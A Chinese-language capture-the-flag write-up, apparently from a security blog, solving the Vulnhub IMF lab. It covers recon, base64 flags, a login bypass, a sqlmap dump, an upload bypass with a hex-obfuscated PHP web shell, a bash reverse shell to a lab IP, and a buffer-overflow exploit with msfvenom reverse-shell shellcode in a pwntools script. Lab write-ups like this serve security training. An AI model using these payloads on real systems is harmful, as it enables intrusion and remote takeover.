[Vulnhub] IMF File Upload Bypass&Buffer Overflow

2024-07-20 245 0

信息收集

IP Address Opening Ports
192.168.8.103 TCP:80

$ nmap -p- 192.168.8.103 --min-rate 1000 -sC -sV

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: IMF - Homepage
|_http-server-header: Apache/2.4.18 (Ubuntu)

Flag 1

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图

http://192.168.8.103/contact.php

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图1

flag1{YWxsdGhlZmlsZXM=}

Flag 2

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图2

拼接几个文件名

$ echo 'ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ=='|base64 -d

flag2{aW1mYWRtaW5pc3RyYXRvcg==}

Flag 3

$ echo 'aW1mYWRtaW5pc3RyYXRvcg=='|base64 -d

解密:imfadministrator

http://192.168.8.103/imfadministrator/

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图3

user=rmichaels&pass[]=123

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图4

flag3{Y29udGludWVUT2Ntcw==}

Flag 4

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图5

$ sqlmap -u "http://192.168.8.103/imfadministrator/cms.php?pagename=home" --cookie "PHPSESSID=mtcagv7kevus11r651k0ekor65" -D admin -T pages --dump-all --batch

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图6

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图7

flag4{dXBsb2Fkcjk0Mi5waHA=}

Flag 5

$ echo "dXBsb2Fkcjk0Mi5waHA="|base64 -d

http://192.168.8.103/imfadministrator/uploadr942.php

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图8

Bypass 1

在请求体内添加GIF8;并且使用十六进制编码绕过WAF过滤system关键字

GIF8;
<?php
"\x73\79\x73\x74\x65\x6d"($_GET['cmd']);
?>

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图9

Bypass 2

$ echo 'FFD8FFEo' | xxd -r -p > test.gif
$ echo '<?php echo `id`; ?>' >> test.gif

GIF8;

<?php
echo `/bin/bash -c 'bash -i >& /dev/tcp/192.168.8.107/10032 0>&1'`;
?>

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图10

www-data@imf:/var/www/html/imfadministrator/uploads$ cat flag5_abc123def.txt

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图11

flag5{YWdlbnRzZXJ2aWNlcw==}

Flag 6

(Kali)$ ./chisel server -p 8888 --reverse

(tmp)$ ./chisel client 192.168.8.107:8888 R:7788:localhost:7788 &

(tmp)$ ./pspy32

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图12

当我们每次输入Agent ID后,会自动以ROOT权限启动一个agent进程

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图13

搜索相关agent命令

www-data@imf:/var/www/html/imfadministrator/uploads$ find / -name agent 2>/tmp/res

通过分析发现进入循环的条件是ID等于0x2ddd984(48093572)

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图14

report函数中的gets函数存在缓冲区溢出

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图15

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图16

GDB-Peda & BOF

$ git clone https://github.com/longld/peda.git ~/peda
$ echo "source ~/peda/peda.py">>~/.gdbinit
$ gdb -q ./agents

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图17

gdb-peda$ pattern_create 2000
gdb-peda$ pattern_offset 0x74414156

偏移量168

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图18

检查二进制文件上启用了哪些安全性

gdb-peda$ checksec

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图19

  • CANARY : disabled
    栈保护机制(Stack Canary)没有启用。栈保护是通过在栈帧中插入一个“金丝雀”(canary)值来检测缓冲区溢出攻击,如果金丝雀值被改变,程序会检测到溢出并终止

  • FORTIFY : disabled
    编译时没有启用 _FORTIFY_SOURCE,这是一个用于在编译和运行时增加内存函数安全检查的机制,例如 strcpy 和 memcpy

  • NX : disabled
    没有启用可执行空间保护(Non-Executable, NX)。NX 位用于标记内存区域为不可执行,以防止代码执行在这些区域(如栈或堆)

  • PIE : disabled
    没有启用位置无关可执行(Position Independent Executable, PIE)。PIE 使得可执行文件在每次加载时都随机化其内存地址,从而增加攻击难度

  • RELRO : Partial
    启用了部分的重定位只读(Relocation Read-Only, RELRO)。Partial RELRO 将 .got 部分设置为只读,以防止修改全局偏移表(GOT)

将二进制文件上传,分析获取call地址

http://ropshell.com/ropsearch?h=fabc1afd43f668df0b812213567d032c

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图20

在缓冲区168范围内写入ShellCode,通过覆盖EIP值跳转到Call eax(0x08048563)的地址,执行ShellCode。

使用 msfvenom 生成shellcode,要求它避免空字符和换行符。

$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.8.107 LPORT=10034 -f python -b "\x00\x0a\x0d"

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图21

利用脚本

# By Maptnh
import argparse
from pwn import *


parser = argparse.ArgumentParser(description='Exploit script using pwntools.')
parser.add_argument('-rhost', required=True, help='Remote host IP address')
parser.add_argument('-rport', type=int, required=True, help='Remote host port')
parser.add_argument('-lport', type=int, required=True, help='Local port to listen on')
args = parser.parse_args()

ip = args.rhost
port = args.rport
local_port = args.lport

client = remote(ip, port)
initial_response = client.recv(512).decode()

# Convert strings to bytes before sending
client.sendline(b"48093572")
response1 = client.recv(512).decode()
client.sendline(b"3")

shellcode = (
    b"\xbe\xd7\x72\xc5\xb1\xd9\xeb\xd9\x74\x24\xf4\x58\x2b"
    b"\xc9\xb1\x12\x31\x70\x12\x03\x70\x12\x83\x17\x76\x27"
    b"\x44\xa6\xac\x50\x44\x9b\x11\xcc\xe1\x19\x1f\x13\x45"
    b"\x7b\xd2\x54\x35\xda\x5c\x6b\xf7\x5c\xd5\xed\xfe\x34"
    b"\x26\xa5\x09\xaf\xce\xb4\x09\x08\x3d\x30\xe8\xe6\x27"
    b"\x12\xba\x55\x1b\x91\xb5\xb8\x96\x16\x97\x52\x47\x38"
    b"\x6b\xca\xff\x69\xa4\x68\x69\xff\x59\x3e\x3a\x76\x7c"
    b"\x0e\xb7\x45\xff"
)

padding = b"A" * (168 - len(shellcode))

call_eax_gadget = b"\x63\x85\x04\x08\n"

payload = shellcode + padding + call_eax_gadget

listener = listen(local_port)
client.send(payload)
listener.wait_for_connection()
listener.interactive()

$ python3 exp.py -rhost 127.0.0.1 -rport 7788 -lport 10034

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图22

[Vulnhub] IMF  File Upload Bypass&Buffer Overflow插图23


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论